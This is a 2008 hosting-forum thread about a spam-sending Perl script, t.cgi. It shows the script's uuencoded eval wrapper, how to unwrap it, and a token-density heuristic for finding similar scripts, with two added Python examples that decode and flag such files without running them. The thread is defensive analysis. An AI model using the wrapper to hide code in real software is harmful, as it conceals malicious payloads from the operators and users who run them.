Can anyone share what the meaning of this code?

Posted by pmabraham, 06-21-2008, 02:26 PM
Greetings: Can anyone share the meaning of this code?
#!/usr/bin/perl
eval(unpack ('u*', <<'nlyypFkusaSx'));
nlyypFkusaSx
__DATA__
Thank you.

Posted by masfenix, 06-21-2008, 02:28 PM
That's not code, and even if it was, it's encrypted.

Posted by foobic, 06-21-2008, 10:30 PM
Not encrypted, just obfuscated. Last edited by foobic; 06-21-2008 at 10:41 PM. Reason: Added indentation

Posted by bear, 06-21-2008, 10:36 PM
Interesting...how was that done, Chris, the de-obfuscation? ...says bear who doesn't know much about PERL

Posted by foobic, 06-21-2008, 10:45 PM
Not much to it - perl, like HTML, is plain text, so this sort of thing decodes just like the useless javascript HTML obfuscators.
1. Change the first "eval" to "print" - shows what the first bit is doing. This turns out to be reading the data part, decoding and evaling it.
2. Change the final eval in the decoded first part to a print, which produces the above (what the code is trying to eval).

Posted by bear, 06-21-2008, 11:07 PM
You change then run it, or is there some intermediary script that outputs the content?

Posted by foobic, 06-21-2008, 11:56 PM
Yes, change and then run - the decoding is done by perl itself. Just don't let it run an eval statement.
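The same two-step unwrapping done statically, as an added example that is not from the thread: instead of editing the script and letting perl run it, Python uudecodes the heredoc (the first eval) and base64-decodes the __DATA__ section (the inner eval) and never executes either stage. The sample script, its tag name and both stages are constructed here; the real t.cgi payload is not reproduced.

```python
import base64
import binascii
import re

# Constructed stand-in for the obfuscated script (NOT the t.cgi payload from the
# thread): stage 1 is uuencoded in a heredoc, stage 2 is base64 under __DATA__.
STAGE1 = 'eval(decode_base64(join "", <DATA>));'
STAGE2 = 'print "the real mailer code would be here\\n";'

def build_sample():
    """Assemble a script shaped like the one posted, from the constructed stages."""
    uu = "".join(binascii.b2a_uu(STAGE1[i:i + 45].encode()).decode()
                 for i in range(0, len(STAGE1), 45))
    b64 = base64.encodebytes(STAGE2.encode()).decode()
    return ("#!/usr/bin/perl\neval(unpack ('u*', <<'TAG'));\n" + uu
            + "TAG\n__DATA__\n" + b64)

# eval(unpack('u*', <<'TAG')); ... TAG  -- the first eval foobic says to replace
HEREDOC = re.compile(
    r"unpack\s*\(\s*'u\*'\s*,\s*<<'(\w+)'\s*\)\s*\)\s*;[ \t]*\n(.*?)^\1[ \t]*$",
    re.S | re.M)

def decode_stage1(script):
    """Same result as changing the first eval to print: uudecode the heredoc."""
    m = HEREDOC.search(script)
    if not m:
        return None
    lines = [l for l in m.group(2).splitlines() if l.strip()]
    return b"".join(binascii.a2b_uu(l.encode()) for l in lines).decode("latin-1")

def decode_data_section(script):
    """Same result as changing the inner eval to print: base64-decode __DATA__."""
    _, sep, data = script.partition("__DATA__\n")
    if not sep:
        return None
    return base64.b64decode(re.sub(r"\s", "", data)).decode("latin-1")

def analyse(script):
    """Decode both stages without executing anything and report eval usage."""
    s1 = decode_stage1(script)
    s2 = decode_data_section(script)
    return {"stage1": s1, "stage2": s2,
            "stage1_has_eval": bool(s1 and re.search(r"\beval\b", s1)),
            "stage2_has_eval": bool(s2 and re.search(r"\beval\b", s2))}

if __name__ == "__main__":
    for k, v in analyse(build_sample()).items():
        print(k, "=", v)
```

If a real sample's stage 1 turns out to do something other than base64-decode __DATA__, decode_data_section needs adjusting to match; the decoded stage 1 text tells you what.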

Posted by pmabraham, 06-22-2008, 07:19 AM
Greetings Chris: Thank you very much. One of our customers had a lot of spamming going on through a web server, and we tracked it to a user account where the main suspicious content was a perl program named t.cgi. Is there anything common, pattern-based, about the obfuscated code that one could search a server on with a good hope to catch other obfuscated programs that are of similar (aka spammer) nature? Thank you again.

Posted by foobic, 06-22-2008, 08:48 AM
You're welcome, Peter. Since the encoding method could take any form I doubt you'll have much luck looking for patterns like the coded form of "/usr/sbin/sendmail" in the data. The one thing it depends on is that first "eval", so maybe you could run an automated search for similar stealth scripts by looking for the presence of at least one "eval". There are ways to do this without using eval though, and in any case you'd probably want something more selective. Perhaps you could look at the density of the common functions, keywords and special characters, e.g. in a perl script count the number of $ @ { } if else sub use require etc. and divide by the file size. Run the analysis on a collection of normal scripts to get an idea of the range of densities for innocent programs, then flag anything that falls outside the range. HTH
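The density heuristic sketched above, as an added example that is not from the thread: count the listed tokens per byte, derive a range from known-good scripts, and flag anything outside it. The known-good scripts and the t.cgi stand-in are constructed here, and the 50% widening of the range is an assumption to tune against your own collection.

```python
import re

# The tokens foobic suggests counting: $ @ { } if else sub use require
TOKENS = re.compile(r"[$@{}]|\b(?:if|else|sub|use|require)\b")

def token_density(source):
    """Number of those tokens divided by the file size in bytes."""
    if not source:
        return 0.0
    return len(TOKENS.findall(source)) / len(source.encode())

def baseline(normal_scripts, margin=0.5):
    """Density range seen in known-good scripts, widened by margin (an assumption)."""
    d = [token_density(s) for s in normal_scripts]
    lo, hi = min(d), max(d)
    slack = margin * (hi - lo)
    return lo - slack, hi + slack

def flag_outliers(candidates, lo, hi):
    """Return {name: density} for every script whose density is outside [lo, hi]."""
    scored = {name: token_density(src) for name, src in candidates.items()}
    return {name: d for name, d in scored.items() if not lo <= d <= hi}

# Constructed known-good scripts (not from any real server).
NORMAL = {
    "greet.pl": "#!/usr/bin/perl\nuse strict;\nmy $n = shift;\n"
                "if ($n) { print \"hi $n\\n\"; } else { print \"hi\\n\"; }\n",
    "form.pl": "#!/usr/bin/perl\nuse CGI;\nmy $q = CGI->new;\n"
               "sub hello { my $who = shift; return \"hi $who\"; }\n"
               "print hello($q->param('name'));\n",
    "list.pl": "#!/usr/bin/perl\nrequire Exporter;\nour @ISA = ('Exporter');\n"
               "my @list = (1, 2, 3);\nforeach my $x (@list) { print $x; }\n",
}
# Constructed stand-in for the obfuscated t.cgi: almost nothing but encoded data.
SUSPECT = {"t.cgi": "#!/usr/bin/perl\neval(unpack ('u*', <<'X'));\n"
                    + "M" * 1500 + "\nX\n__DATA__\n" + "QUJDREVG" * 300 + "\n"}

if __name__ == "__main__":
    lo, hi = baseline(NORMAL.values())
    print("normal range: %.3f .. %.3f" % (lo, hi))
    print("flagged:", flag_outliers({**NORMAL, **SUSPECT}, lo, hi))
```

With a handful of baseline scripts the range is narrow and tiny legitimate scripts will be flagged too; the heuristic only earns its keep once the baseline covers the variety of scripts actually hosted.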



Copyright © 2018 DC International LLC. - All Rights Reserved.